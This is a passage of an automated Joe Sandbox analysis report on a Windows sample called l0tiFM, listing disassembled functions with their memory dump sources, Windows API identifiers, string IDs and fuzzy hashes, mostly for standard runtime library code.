                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileInfoSleepStartupType
                                                                                                                • String ID:
                                                                                                                • API String ID: 1527402494-0
                                                                                                                • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                                                                                • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                                                                                                • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                                                                                • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                                                                                                Function 0000000140009E30 Relevance: 7.6, APIs: 5, Instructions: 74COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CommandLine$ByteCharErrorLastMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 3078728599-0
                                                                                                                • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                                                                                • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                                                                                                • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                                                                                • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                                                                                                Function 000000014000FD50 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 1850339568-0
                                                                                                                • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                                                                                • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                                                                                                • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                                                                                • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                                                                                                Function 00007FFBC320FB54 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _set_statfp
                                                                                                                • String ID:
                                                                                                                • API String ID: 1156100317-0
                                                                                                                • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                                                                                • Instruction ID: 46cc5dcd53557b42516c928f39491b11e945224738e3ce02a790eab27aa36c01
                                                                                                                • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                                                                                • Instruction Fuzzy Hash: B611B4B2D9864B21FE643D38D325B7B12005F9C370F9C4230E56E2E2DA9E2C5C484700
                                                                                                                Function 00007FFBC3209684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FFBC320766F,?,?,00000000,00007FFBC320790A,?,?,?,?,?,00007FFBC3207896), ref: 00007FFBC32096A3
                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FFBC320766F,?,?,00000000,00007FFBC320790A,?,?,?,?,?,00007FFBC3207896), ref: 00007FFBC32096C2
                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FFBC320766F,?,?,00000000,00007FFBC320790A,?,?,?,?,?,00007FFBC3207896), ref: 00007FFBC32096EA
                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FFBC320766F,?,?,00000000,00007FFBC320790A,?,?,?,?,?,00007FFBC3207896), ref: 00007FFBC32096FB
                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FFBC320766F,?,?,00000000,00007FFBC320790A,?,?,?,?,?,00007FFBC3207896), ref: 00007FFBC320970C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value
                                                                                                                • String ID:
                                                                                                                • API String ID: 3702945584-0
                                                                                                                • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                                                                                • Instruction ID: 863471b9393fcf372de28e4fe3f5ea54804387744f2d3cc0a7b66040f7d46c27
                                                                                                                • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                                                                                • Instruction Fuzzy Hash: 061108F1A0C24245FE58BE35E55197B63519F447F0FDC4234E82E6E6E6EE2CE4459B00
                                                                                                                Function 00007FFBC3209518 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value
                                                                                                                • String ID:
                                                                                                                • API String ID: 3702945584-0
                                                                                                                • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                                                                                • Instruction ID: f09811be4aabe796a3d0d19616357d09b1b139ca1cb93bfe0b2132573550671a
                                                                                                                • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                                                                                • Instruction Fuzzy Hash: 2C11B6F0A092464AFE68BE72D45297B67518F44770E9C0634D93F2D2E2DD2CB4499B10
                                                                                                                Function 00007FFBC3205448 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                • String ID: MOC$RCC
                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                                                                                • Instruction ID: bc13a64d3d9333e1b4f10ba763cecc5c8f9defc2cfca4ca532505b58e41e59a4
                                                                                                                • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                                                                                • Instruction Fuzzy Hash: 289193B3A087858AEB10EF74D4806AE7BA0FB44788F58413AEB4D2B755DF38D199C700
                                                                                                                Function 00007FFBC3203A38 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                • String ID: csm
                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                                                                                • Instruction ID: 928aa74c63e6ba45b63879787781fe666bb26cd3bea429ba50938ed951316d26
                                                                                                                • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                                                                                • Instruction Fuzzy Hash: A551C172B096428ADF14EF39D484E3A7391EB44B88F888130EB4A5B788DF7CE845C700
                                                                                                                Function 00007FFBC32059C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                • String ID: csm$csm
                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                                                                                • Instruction ID: dc75bc0ad159981e4af71e124b3389786561e70c56483767095489e48a05d63f
                                                                                                                • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                                                                                • Instruction Fuzzy Hash: 04517FB290C3828AEF64AF21D484B6A77A0EB54B84FAC4135DA4D6BB85CF3CF454C700
                                                                                                                Function 00007FFBC32051D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                • String ID: MOC$RCC
                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                                                                                • Instruction ID: 48d53e1834c5f5568877b8f373fd703032ebd8ef0c8d49752ac5a3fb3da99da6
                                                                                                                • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                                                                                • Instruction Fuzzy Hash: F861927290CBC585DB60AF25E4407AAB7A0FB84B84F584225EB9C1BB55DF7CD194CB00
                                                                                                                Function 000000014000EDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLoadModuleProc
                                                                                                                • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                                                                • API String ID: 3055805555-3733552308
                                                                                                                • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                                                                                • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                                                                                                • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                                                                                • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                                                                                                Function 00000001400026F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentSizeWorking
                                                                                                                • String ID: Shrinking process size
                                                                                                                • API String ID: 2122760700-652428428
                                                                                                                • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                                                                                • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                                                                                                • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                                                                                • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                                                                                                Function 00000001400030B0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Enter$Leave
                                                                                                                • String ID:
                                                                                                                • API String ID: 2801635615-0
                                                                                                                • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                                                                                • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                                                                                                • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                                                                                • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                                                                                                Function 00007FFBC320E3F4 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                • String ID:
                                                                                                                • API String ID: 2718003287-0
                                                                                                                • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                                                                                • Instruction ID: 722782294bf27c7b0e1d60491b4610e1c2fb1880d4af5d019b3b60bd6a29d323
                                                                                                                • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                                                                                • Instruction Fuzzy Hash: CDD108B2F08A8189EB11DF75D4806ED37B1FB44798B884236DE5D6BB99DE38D44AC340
                                                                                                                Function 00007FFBC320ED1C Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFBC320ED07), ref: 00007FFBC320EE38
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFBC320ED07), ref: 00007FFBC320EEC3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                • String ID:
                                                                                                                • API String ID: 953036326-0
                                                                                                                • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                                                                                • Instruction ID: bc0060bbca3f17f6f7ed8b7e9410476f719397b99e53a02845e36e2fa3eb9091
                                                                                                                • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                                                                                • Instruction Fuzzy Hash: A091C7B2F18A5185FF60AF75D440A7E6BA4AB04798F984135DE4E7A685DF38D48AC300
                                                                                                                Function 0000000140004760 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                                                                                                • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                                                                                                • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalEventSection$EnterLeaveReset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3553466030-0
                                                                                                                • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                                                                                • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                                                                                                • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                                                                                • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                                                                                                Function 0000000140004400 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalEventSection$EnterLeaveReset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3553466030-0
                                                                                                                • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                                                                                • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                                                                                                • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                                                                                • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                                                                                                Function 00007FFBC3202218 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
